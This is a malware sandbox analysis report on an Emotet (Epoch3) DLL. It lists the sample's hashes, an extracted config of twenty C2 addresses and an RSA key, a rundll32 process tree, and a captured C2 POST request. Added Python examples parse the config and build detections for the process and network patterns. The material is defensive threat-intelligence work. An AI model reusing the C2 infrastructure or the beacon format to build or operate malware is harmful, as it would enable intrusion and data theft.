Analysis

  • max time kernel
    135s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    11/09/2024, 18:21 UTC

General

  • Target

    daf54255b8dd982cd71051a78d62f4fa_JaffaCakes118.dll

  • Size

    330KB

  • MD5

    daf54255b8dd982cd71051a78d62f4fa

  • SHA1

    3ae8e73cc44b480d6810be47a718d98eb28f94df

  • SHA256

    0057e700df980654431d80a7caa0c4fbc568172823f236f2ef0acb01c8740324

  • SHA512

    15441892ea0b099eba95189bb3a8c2dc0cc379220721fc361145fed88a482c054bf476d631f5612141ecd6e222dcca101c81bd4fcf91ab07391d70e30ecf409c

  • SSDEEP

    3072:9Rq1sFAd2gQ5PmBvNZwnnq1gn2RvoXiDzAYgrO1v2F5j81qc:3q1sFAwgwmBv3wnIgG4oAYxvU54gc

Malware Config

Extracted

Family

emotet

Botnet

Epoch3

C2

190.55.186.229:80

203.157.152.9:7080

157.245.145.87:443

109.99.146.210:8080

116.202.10.123:8080

172.96.190.154:8080

163.53.204.180:443

190.107.118.125:80

91.93.3.85:8080

185.142.236.163:443

115.79.195.246:80

120.51.34.254:80

192.210.217.94:8080

198.20.228.9:8080

91.75.75.46:80

54.38.143.245:8080

161.49.84.2:80

162.144.145.58:8080

178.33.167.120:8080

201.193.160.196:80

rsa_pubkey.plain

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
-----END PUBLIC KEY-----
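The extracted config above is just text; to use it you want it as structured IoCs and you want to know what the key actually is. The following is an added example written for this report (not tria.ge code and not part of Emotet). It embeds the C2 list and the PEM exactly as printed in the Malware Config section, parses the SubjectPublicKeyInfo with a small stdlib-only DER reader to recover the RSA modulus size and exponent, and cross-references the config with the four remote endpoints listed under Network further down (CONTACTED is transcribed from that section, not computed).

```python
"""Turn the Malware Config of this report into machine-checkable IoCs.

Added example for this report; not tria.ge code and not Emotet's.
C2_LIST and RSA_PUBKEY_PEM are copied verbatim from the Malware Config
section. CONTACTED is the set of remote endpoints shown in the Network
section of the same report (an assumption transcribed from the page).
"""
import base64
import json
import re

C2_LIST = """\
190.55.186.229:80
203.157.152.9:7080
157.245.145.87:443
109.99.146.210:8080
116.202.10.123:8080
172.96.190.154:8080
163.53.204.180:443
190.107.118.125:80
91.93.3.85:8080
185.142.236.163:443
115.79.195.246:80
120.51.34.254:80
192.210.217.94:8080
198.20.228.9:8080
91.75.75.46:80
54.38.143.245:8080
161.49.84.2:80
162.144.145.58:8080
178.33.167.120:8080
201.193.160.196:80
"""

RSA_PUBKEY_PEM = """\
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
-----END PUBLIC KEY-----
"""

# Endpoints listed under Network in this report (transcribed from the page).
CONTACTED = {"190.55.186.229:80", "203.157.152.9:7080",
             "157.245.145.87:443", "109.99.146.210:8080"}

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1


def parse_c2_list(text):
    """Return [(ip, port), ...] preserving config order."""
    entries = []
    for line in text.splitlines():
        m = re.fullmatch(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})", line.strip())
        if m:
            entries.append((m.group(1), int(m.group(2))))
    return entries


def _tlv(buf, pos):
    """Read one DER TLV at pos; returns (tag, value, end). Handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(pem):
    """Decode a PEM SubjectPublicKeyInfo and return modulus size, exponent and modulus hex."""
    der = base64.b64decode("".join(l for l in pem.splitlines() if not l.startswith("-----")))
    tag, spki, _ = _tlv(der, 0)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo is not a SEQUENCE")
    tag, alg, after_alg = _tlv(spki, 0)          # AlgorithmIdentifier
    _, oid, _ = _tlv(alg, 0)
    if oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bitstr, _ = _tlv(spki, after_alg)       # BIT STRING; first byte = unused bits
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("unexpected BIT STRING")
    _, rsa, _ = _tlv(bitstr, 1)                  # RSAPublicKey ::= SEQUENCE { n INTEGER, e INTEGER }
    _, n_bytes, after_n = _tlv(rsa, 0)
    _, e_bytes, _ = _tlv(rsa, after_n)
    n = int.from_bytes(n_bytes, "big")
    e = int.from_bytes(e_bytes, "big")
    return {"modulus_bits": n.bit_length(), "exponent": e, "modulus_hex": f"{n:x}"}


def contacted_indexes(c2s, contacted):
    """Positions in the config list of the C2s the sandbox run actually reached out to."""
    return [i for i, (ip, port) in enumerate(c2s) if f"{ip}:{port}" in contacted]


def build_report():
    c2s = parse_c2_list(C2_LIST)
    key = parse_rsa_spki(RSA_PUBKEY_PEM)
    return {
        "family": "emotet",
        "botnet": "Epoch3",
        "c2_count": len(c2s),
        "c2": [f"{ip}:{port}" for ip, port in c2s],
        "rsa_modulus_bits": key["modulus_bits"],
        "rsa_exponent": key["exponent"],
        "contacted_config_positions": contacted_indexes(c2s, CONTACTED),
    }


if __name__ == "__main__":
    print(json.dumps(build_report(), indent=2))
```

Running it reports a 768-bit modulus with e = 65537 for the key above, and places the four endpoints seen under Network at positions 0 to 3 of the config list: the run walked the list from the top in order. The check on the rsaEncryption OID and the BIT STRING padding byte is there so that a config that was extracted wrongly fails loudly rather than yielding a nonsense key size.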

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Blocklisted process makes network request (9 IoCs)
  • System Location Discovery: System Language Discovery (1 TTP, 1 IoC)

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses (5 IoCs)
  • Suspicious use of WriteProcessMemory (7 IoCs)

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\daf54255b8dd982cd71051a78d62f4fa_JaffaCakes118.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\daf54255b8dd982cd71051a78d62f4fa_JaffaCakes118.dll,#1
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:1724
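The process tree shows the pattern worth encoding as a detection: rundll32 invoked on a DLL in the user's Temp directory, the export called by ordinal (#1) rather than by name, and the 64-bit system32 rundll32 re-spawning the SysWOW64 copy with the identical command line because the DLL is 32-bit. The following is an added example (not tria.ge code) that expresses these three checks over constructed process-creation events in the shape of Sysmon Event ID 1 fields. The two rundll32 events are taken from the tree above (the parent of PID 2204 is not shown on the page and is left as None); the third event is a constructed benign Control Panel launch for contrast.

```python
"""Flag the rundll32 launch pattern from the Processes section.

Added example for this report, not tria.ge code. Events are constructed
here with Sysmon Event ID 1 style fields. PIDs 2204 and 1724 reproduce
the process tree above; PID 3100 is a constructed benign control.
"""
import re

_DLL = r"C:\Users\Admin\AppData\Local\Temp\daf54255b8dd982cd71051a78d62f4fa_JaffaCakes118.dll"

EVENTS = [
    {"pid": 2204, "ppid": None, "parent_image": None,     # parent not shown in the report
     "image": r"C:\Windows\system32\rundll32.exe",
     "cmd": f"rundll32.exe {_DLL},#1"},
    {"pid": 1724, "ppid": 2204,
     "parent_image": r"C:\Windows\system32\rundll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmd": f"rundll32.exe {_DLL},#1"},
    {"pid": 3100, "ppid": 900,                            # constructed benign control
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\system32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL"},
]

# rundll32 <dll>,<export>  where export is a name or an ordinal such as #1
RUNDLL_RE = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+?\.dll)"?\s*,\s*(?P<export>#\d+|[A-Za-z_]\w*)',
    re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Temp|Downloads|Public)\\", re.IGNORECASE)


def rundll32_indicators(ev, events_by_pid):
    """Return the list of indicator names that fire for one process-creation event."""
    hits = []
    m = RUNDLL_RE.search(ev["cmd"])
    if not m:
        return hits
    dll, export = m.group("dll"), m.group("export")
    if USER_WRITABLE_RE.search(dll):
        hits.append("dll_in_user_writable_path")
    if export.startswith("#"):
        hits.append("export_called_by_ordinal")      # legitimate callers almost always name the export
    parent = events_by_pid.get(ev["ppid"])
    if (parent is not None
            and parent["image"].lower().endswith(r"\system32\rundll32.exe")
            and ev["image"].lower().endswith(r"\syswow64\rundll32.exe")
            and parent["cmd"] == ev["cmd"]):
        hits.append("wow64_respawn_same_cmdline")     # 64-bit host re-launching a 32-bit DLL
    return hits


def triage(events):
    """Map pid -> indicators for every event in the batch."""
    by_pid = {e["pid"]: e for e in events}
    return {e["pid"]: rundll32_indicators(e, by_pid) for e in events}


if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, hits or "clean")
```

The WoW64 re-spawn check needs the parent event, which is why the function takes the whole batch keyed by PID; on a live Sysmon feed the parent is the ParentProcessId of the same event. The hash-like file name in the command line is a submission convention of this corpus rather than something the sample chose, so it is deliberately not used as an indicator.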

Network

  • HTTP request: rundll32.exe -> 157.245.145.87:443 (geo: SG)
    POST http://157.245.145.87:443/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/
    Request
    POST /7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/ HTTP/1.1
    DNT: 0
    Referer: 157.245.145.87/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/
    Content-Type: multipart/form-data; boundary=---------23zxW27BD
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 157.245.145.87:443
    Content-Length: 6084
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://157.245.145.87:443/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/
    Cache-Control: private, no-cache, max-age=0
    Pragma: no-cache
    Server:LiteSpeed
    Content-Length: 0
    Connection: Close

  • Connections (process is rundll32.exe in every row; "-" = nothing received)

    Remote address        Protocol  Sent    Received  Pkts sent  Pkts recv  URL / result
    190.55.186.229:80     -         152 B   -         3          -
    190.55.186.229:80     -         152 B   -         3          -
    203.157.152.9:7080    -         152 B   -         3          -
    203.157.152.9:7080    -         152 B   -         3          -
    157.245.145.87:443    http      6.3kB   576 B     8          8          POST http://157.245.145.87:443/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/ -> 301
    157.245.145.87:443    tls       716 B   1.8kB     9          7
    109.99.146.210:8080   -         152 B   -         3          -
    109.99.146.210:8080   -         152 B   -         3          -
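The one request that got an answer is a good specimen for detection work: a multipart POST to a bare IP with an explicit :443 in the Host header sent over plaintext HTTP, a Referer with no scheme that simply mirrors the request path, and a path made of random-looking alphanumeric segments. The following is an added example (not tria.ge code) that scores a raw request on exactly those traits. EMOTET_POST reproduces the captured headers above (body omitted); BENIGN_POST is a constructed browser file upload used as a control. The threshold of four indicators is an assumption chosen for this example.

```python
"""Score a captured HTTP request for the traits visible in the POST above.

Added example for this report, not tria.ge code. EMOTET_POST copies the
request headers from the Network section (body omitted); BENIGN_POST is
a constructed control. Only traits observable in the request itself are
scored; the threshold is an assumption for this example.
"""
import re

EMOTET_POST = (
    "POST /7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/ HTTP/1.1\r\n"
    "DNT: 0\r\n"
    "Referer: 157.245.145.87/7r6sz/9a1nc6v/u3uptv1p/9mr1gcm/63q8fppz1mxk4/h3kida/\r\n"
    "Content-Type: multipart/form-data; boundary=---------23zxW27BD\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
    "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; "
    ".NET4.0C; .NET4.0E; InfoPath.3)\r\n"
    "Host: 157.245.145.87:443\r\n"
    "Content-Length: 6084\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign control: a browser upload to a named host over TLS.
BENIGN_POST = (
    "POST /api/upload HTTP/1.1\r\n"
    "Host: files.example.com\r\n"
    "Referer: https://files.example.com/upload\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Length: 512\r\n"
    "\r\n"
)

IPV4_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::(\d{1,5}))?$")
SEGMENT_RE = re.compile(r"^[a-z0-9]{4,16}$")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers) with lower-cased header names."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def looks_random(segment):
    """Lowercase alphanumeric mixing letters and digits: no dictionary word, no extension."""
    return (bool(SEGMENT_RE.match(segment))
            and any(c.isdigit() for c in segment)
            and any(c.isalpha() for c in segment))


def indicators(raw, tls=False):
    """Return the indicator names that fire; tls says whether the request was seen inside TLS."""
    method, path, h = parse_request(raw)
    host, referer, ctype = h.get("host", ""), h.get("referer", ""), h.get("content-type", "")
    hits = []
    ip = IPV4_HOST_RE.match(host)
    if ip:
        hits.append("bare_ip_host")
        if not tls and ip.group(1) == "443":
            hits.append("plaintext_http_to_443")
    if referer and not re.match(r"^https?://", referer):
        hits.append("referer_without_scheme")
    if referer and referer.endswith(path):
        hits.append("referer_mirrors_request_path")
    if method == "POST" and ctype.lower().startswith("multipart/form-data"):
        hits.append("multipart_post")
    segments = [s for s in path.split("/") if s]
    if len(segments) >= 3 and all(looks_random(s) for s in segments):
        hits.append("random_path_segments")
    return hits


def verdict(raw, tls=False, threshold=4):
    hits = indicators(raw, tls)
    return {"indicators": hits, "suspicious": len(hits) >= threshold}


if __name__ == "__main__":
    print("captured:", verdict(EMOTET_POST))
    print("benign:  ", verdict(BENIGN_POST, tls=True))
```

The captured request fires all six indicators; the benign upload fires only multipart_post. Note what the server did with it: a 301 to the same URL over https with an empty body, so the 6,084-byte multipart body was never accepted on the plaintext connection, and the tls row that follows in the table is the retry. Plaintext HTTP to port 443 is therefore a trait the C2 itself rejected, which makes it a strong signal for this run, but a detection should not depend on the server's response since other endpoints in the config listen on 80, 7080 and 8080.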

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab6D55.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • memory/1724-0-0x0000000000170000-0x000000000018F000-memory.dmp

    Filesize

    124KB

  • memory/1724-1-0x0000000010000000-0x0000000010023000-memory.dmp

    Filesize

    140KB

  • memory/1724-2-0x0000000010000000-0x0000000010023000-memory.dmp

    Filesize

    140KB

  • memory/1724-3-0x0000000010000000-0x0000000010023000-memory.dmp

    Filesize

    140KB
